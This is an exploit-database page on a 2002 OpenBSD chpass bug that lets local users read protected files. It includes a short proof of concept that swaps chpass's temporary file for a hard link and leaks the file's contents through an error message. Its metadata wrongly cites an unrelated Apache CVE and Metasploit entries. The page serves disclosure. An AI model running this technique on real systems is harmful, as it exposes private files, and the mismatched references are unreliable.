header-logo
Suggest Exploit
vendor:
OpenBSD
by:
SecurityFocus
7.2
CVSS
HIGH
chpass Local File Access
264
CWE
Product Name: OpenBSD
Affected Version From: OpenBSD 2.6
Affected Version To: OpenBSD 3.2
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: o:openbsd:openbsd
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OpenBSD
2002

chpass Local File Access

A vulnerability in chpass, a program included with OpenBSD, allows local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary. An attacker can create a symbolic link to a file containing sensitive information, and then use chpass to view the contents of the file.

Mitigation:

OpenBSD has released patches to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6748/info

It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary.

# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell

Navigation

Suggest Exploit

Services By CQR